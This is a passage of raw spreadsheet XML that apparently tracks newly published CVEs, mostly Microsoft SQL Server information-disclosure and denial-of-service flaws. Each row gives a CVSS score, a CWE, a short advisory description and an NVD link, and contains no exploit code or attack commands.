t="inlineStr" /><c r="J1081" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1081" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1081" s="5" t="inlineStr" /><c r="M1081" s="5" t="inlineStr" /><c r="N1081" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1081" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1081" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1081" s="5" t="inlineStr" /><c r="R1081" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1081" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1081" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t></is></c></row><row r="1082"><c r="A1082" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1082" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1082" s="5" t="inlineStr"><is><t>CVE-2026-67390</t></is></c><c r="D1082" s="5" t="n"><v>6.5</v></c><c r="E1082" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1082" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1082" s="5" t="inlineStr" /><c r="H1082" s="5" t="n"><v>0.01</v></c><c r="I1082" s="5" t="inlineStr" /><c r="J1082" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1082" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1082" s="5" t="inlineStr" /><c r="M1082" s="5" t="inlineStr" /><c r="N1082" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1082" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1082" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1082" s="5" t="inlineStr" /><c r="R1082" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1082" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1082" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t></is></c></row><row r="1083"><c r="A1083" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1083" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1083" s="5" t="inlineStr"><is><t>CVE-2026-67393</t></is></c><c r="D1083" s="5" t="n"><v>6.5</v></c><c r="E1083" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1083" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1083" s="5" t="inlineStr" /><c r="H1083" s="5" t="n"><v>0.007</v></c><c r="I1083" s="5" t="inlineStr" /><c r="J1083" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1083" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1083" s="5" t="inlineStr" /><c r="M1083" s="5" t="inlineStr" /><c r="N1083" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1083" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1083" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1083" s="5" t="inlineStr" /><c r="R1083" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1083" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1083" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t></is></c></row><row r="1084"><c r="A1084" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1084" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1084" s="5" t="inlineStr"><is><t>CVE-2026-67624</t></is></c><c r="D1084" s="5" t="n"><v>6.5</v></c><c r="E1084" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1084" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1084" s="5" t="inlineStr" /><c r="H1084" s="5" t="n"><v>0.006</v></c><c r="I1084" s="5" t="inlineStr" /><c r="J1084" s="5" t="inlineStr" /><c r="K1084" s="5" t="inlineStr" /><c r="L1084" s="5" t="inlineStr" /><c r="M1084" s="5" t="inlineStr" /><c r="N1084" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1084" s="5" t="inlineStr" /><c r="R1084" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1084" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1084" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67624</t></is></c></row><row r="1085"><c r="A1085" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1085" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1085" s="5" t="inlineStr"><is><t>CVE-2026-67629</t></is></c><c r="D1085" s="5" t="n"><v>6.5</v></c><c r="E1085" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1085" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1085" s="5" t="inlineStr" /><c r="H1085" s="5" t="n"><v>0.007</v></c><c r="I1085" s="5" t="inlineStr" /><c r="J1085" s="5" t="inlineStr" /><c r="K1085" s="5" t="inlineStr" /><c r="L1085" s="5" t="inlineStr" /><c r="M1085" s="5" t="inlineStr" /><c r="N1085" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1085" s="5" t="inlineStr" /><c r="R1085" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1085" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1085" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67629</t></is></c></row><row r="1086"><c r="A1086" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1086" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1086" s="5" t="inlineStr"><is><t>CVE-2026-67630</t></is></c><c r="D1086" s="5" t="n"><v>6.5</v></c><c r="E1086" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1086" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1086" s="5" t="inlineStr" /><c r="H1086" s="5" t="n"><v>0.007</v></c><c r="I1086" s="5" t="inlineStr" /><c r="J1086" s="5" t="inlineStr" /><c r="K1086" s="5" t="inlineStr" /><c r="L1086" s="5" t="inlineStr" /><c r="M1086" s="5" t="inlineStr" /><c r="N1086" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1086" s="5" t="inlineStr" /><c r="R1086" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1086" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1086" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67630</t></is></c></row><row r="1087"><c r="A1087" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1087" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1087" s="5" t="inlineStr"><is><t>CVE-2026-67633</t></is></c><c r="D1087" s="5" t="n"><v>6.5</v></c><c r="E1087" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1087" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1087" s="5" t="inlineStr" /><c r="H1087" s="5" t="n"><v>0.008</v></c><c r="I1087" s="5" t="inlineStr" /><c r="J1087" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1087" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1087" s="5" t="inlineStr" /><c r="M1087" s="5" t="inlineStr" /><c r="N1087" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1087" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1087" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1087" s="5" t="inlineStr" /><c r="R1087" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1087" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1087" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t></is></c></row><row r="1088"><c r="A1088" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1088" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1088" s="5" t="inlineStr"><is><t>CVE-2026-67641</t></is></c><c r="D1088" s="5" t="n"><v>6.5</v></c><c r="E1088" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1088" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1088" s="5" t="inlineStr" /><c r="H1088" s="5" t="n"><v>0.006</v></c><c r="I1088" s="5" t="inlineStr" /><c r="J1088" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1088" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1088" s="5" t="inlineStr" /><c r="M1088" s="5" t="inlineStr" /><c r="N1088" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1088" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1088" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1088" s="5" t="inlineStr" /><c r="R1088" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1088" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1088" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t></is></c></row><row r="1089"><c r="A1089" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1089" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1089" s="5" t="inlineStr"><is><t>CVE-2026-67645</t></is></c><c r="D1089" s="5" t="n"><v>6.5</v></c><c r="E1089" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1089" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1089" s="5" t="inlineStr" /><c r="H1089" s="5" t="n"><v>0.006</v></c><c r="I1089" s="5" t="inlineStr" /><c r="J1089" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1089" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1089" s="5" t="inlineStr" /><c r="M1089" s="5" t="inlineStr" /><c r="N1089" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1089" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1089" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1089" s="5" t="inlineStr" /><c r="R1089" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1089" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1089" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t></is></c></row><row r="1090"><c r="A1090" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1090" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1090" s="5" t="inlineStr"><is><t>CVE-2026-67648</t></is></c><c r="D1090" s="5" t="n"><v>6.5</v></c><c r="E1090" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1090" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1090" s="5" t="inlineStr" /><c r="H1090" s="5" t="n"><v>0.006</v></c><c r="I1090" s="5" t="inlineStr" /><c r="J1090" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1090" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1090" s="5" t="inlineStr" /><c r="M1090" s="5" t="inlineStr" /><c r="N1090" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1090" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1090" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1090" s="5" t="inlineStr" /><c r="R1090" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1090" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1090" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t></is></c></row><row r="1091"><c r="A1091" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1091" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1091" s="5" t="inlineStr"><is><t>CVE-2026-68776</t></is></c><c r="D1091" s="5" t="n"><v>6.5</v></c><c r="E1091" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1091" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1091" s="5" t="inlineStr" /><c r="H1091" s="5" t="n"><v>0.006</v></c><c r="I1091" s="5" t="inlineStr" /><c r="J1091" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1091" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1091" s="5" t="inlineStr" /><c r="M1091" s="5" t="inlineStr" /><c r="N1091" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1091" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1091" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1091" s="5" t="inlineStr" /><c r="R1091" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1091" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1091" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t></is></c></row><row r="1092"><c r="A1092" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1092" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1092" s="5" t="inlineStr"><is><t>CVE-2026-68777</t></is></c><c r="D1092" s="5" t="n"><v>6.5</v></c><c r="E1092" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1092" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1092" s="5" t="inlineStr" /><c r="H1092" s="5" t="n"><v>0.007</v></c><c r="I1092" s="5" t="inlineStr" /><c r="J1092" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1092" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1092" s="5" t="inlineStr" /><c r="M1092" s="5" t="inlineStr" /><c r="N1092" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1092" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1092" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1092" s="5" t="inlineStr" /><c r="R1092" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1092" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1092" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t></is></c></row><row r="1093"><c r="A1093" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1093" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1093" s="5" t="inlineStr"><is><t>CVE-2026-68778</t></is></c><c r="D1093" s="5" t="n"><v>6.5</v></c><c r="E1093" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1093" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1093" s="5" t="inlineStr" /><c r="H1093" s="5" t="n"><v>0.007</v></c><c r="I1093" s="5" t="inlineStr" /><c r="J1093" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1093" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1093" s="5" t="inlineStr" /><c r="M1093" s="5" t="inlineStr" /><c r="N1093" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1093" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1093" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1093" s="5" t="inlineStr" /><c r="R1093" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1093" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1093" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t></is></c></row><row r="1094"><c r="A1094" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1094" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1094" s="5" t="inlineStr"><is><t>CVE-2026-68779</t></is></c><c r="D1094" s="5" t="n"><v>6.5</v></c><c r="E1094" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1094" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1094" s="5" t="inlineStr" /><c r="H1094" s="5" t="n"><v>0.006</v></c><c r="I1094" s="5" t="inlineStr" /><c r="J1094" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1094" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1094" s="5" t="inlineStr" /><c r="M1094" s="5" t="inlineStr" /><c r="N1094" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1094" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1094" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1094" s="5" t="inlineStr" /><c r="R1094" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1094" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1094" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t></is></c></row><row r="1095"><c r="A1095" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1095" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1095" s="5" t="inlineStr"><is><t>CVE-2026-68780</t></is></c><c r="D1095" s="5" t="n"><v>6.5</v></c><c r="E1095" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1095" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1095" s="5" t="inlineStr" /><c r="H1095" s="5" t="n"><v>0.007</v></c><c r="I1095" s="5" t="inlineStr" /><c r="J1095" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1095" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1095" s="5" t="inlineStr" /><c r="M1095" s="5" t="inlineStr" /><c r="N1095" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1095" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1095" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1095" s="5" t="inlineStr" /><c r="R1095" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1095" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1095" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t></is></c></row><row r="1096"><c r="A1096" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1096" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1096" s="5" t="inlineStr"><is><t>CVE-2026-68781</t></is></c><c r="D1096" s="5" t="n"><v>6.5</v></c><c r="E1096" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1096" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1096" s="5" t="inlineStr" /><c r="H1096" s="5" t="n"><v>0.007</v></c><c r="I1096" s="5" t="inlineStr" /><c r="J1096" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1096" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1096" s="5" t="inlineStr" /><c r="M1096" s="5" t="inlineStr" /><c r="N1096" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1096" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1096" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1096" s="5" t="inlineStr" /><c r="R1096" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1096" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1096" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t></is></c></row><row r="1097"><c r="A1097" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1097" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1097" s="5" t="inlineStr"><is><t>CVE-2026-68784</t></is></c><c r="D1097" s="5" t="n"><v>6.5</v></c><c r="E1097" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1097" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1097" s="5" t="inlineStr" /><c r="H1097" s="5" t="n"><v>0.007</v></c><c r="I1097" s="5" t="inlineStr" /><c r="J1097" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1097" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1097" s="5" t="inlineStr" /><c r="M1097" s="5" t="inlineStr" /><c r="N1097" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1097" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1097" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1097" s="5" t="inlineStr" /><c r="R1097" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1097" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1097" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t></is></c></row><row r="1098"><c r="A1098" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1098" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1098" s="5" t="inlineStr"><is><t>CVE-2026-68898</t></is></c><c r="D1098" s="5" t="n"><v>6.5</v></c><c r="E1098" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1098" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1098" s="5" t="inlineStr" /><c r="H1098" s="5" t="n"><v>0.006</v></c><c r="I1098" s="5" t="inlineStr" /><c r="J1098" s="5" t="inlineStr" /><c r="K1098" s="5" t="inlineStr" /><c r="L1098" s="5" t="inlineStr" /><c r="M1098" s="5" t="inlineStr" /><c r="N1098" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1098" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1098" s="5" t="inlineStr" /><c r="R1098" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1098" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1098" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t></is></c></row><row r="1099"><c r="A1099" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1099" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1099" s="5" t="inlineStr"><is><t>CVE-2026-69267</t></is></c><c r="D1099" s="5" t="n"><v>6.5</v></c><c r="E1099" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1099" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1099" s="5" t="inlineStr" /><c r="H1099" s="5" t="n"><v>0.003</v></c><c r="I1099" s="5" t="inlineStr" /><c r="J1099" s="5" t="inlineStr" /><c r="K1099" s="5" t="inlineStr" /><c r="L1099" s="5" t="inlineStr" /><c r="M1099" s="5" t="inlineStr" /><c r="N1099" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1099" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1099" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1099" s="5" t="inlineStr" /><c r="R1099" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1099" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t></is></c><c r="T1099" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t></is></c></row><row r="1100"><c r="A1100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1100" s="5" t="inlineStr"><is><t>CVE-2026-69297</t></is></c><c r="D1100" s="5" t="n"><v>6.5</v></c><c r="E1100" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1100" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1100" s="5" t="inlineStr" /><c r="H1100" s="5" t="n"><v>0.006</v></c><c r="I1100" s="5" t="inlineStr" /><c r="J1100" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1100" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1100" s="5" t="inlineStr" /><c r="M1100" s="5" t="inlineStr" /><c r="N1100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1100" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1100" s="5" t="inlineStr" /><c r="R1100" s="5" t="inlineStr"><is><t>CWE-257</t></is></c><c r="S1100" s="5" t="inlineStr"><is><t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t></is></c></row><row r="1101"><c r="A1101" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1101" s="5" t="inlineStr"><is><t>CVE-2026-69361</t></is></c><c r="D1101" s="5" t="n"><v>6.5</v></c><c r="E1101" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1101" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1101" s="5" t="inlineStr" /><c r="H1101" s="5" t="n"><v>0.008</v></c><c r="I1101" s="5" t="inlineStr" /><c r="J1101" s="5" t="inlineStr" /><c r="K1101" s="5" t="inlineStr" /><c r="L1101" s="5" t="inlineStr" /><c r="M1101" s="5" t="inlineStr" /><c r="N1101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1101" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1101" s="5" t="inlineStr" /><c r="R1101" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1101" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69361</t></is></c></row><row r="1102"><c r="A1102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c 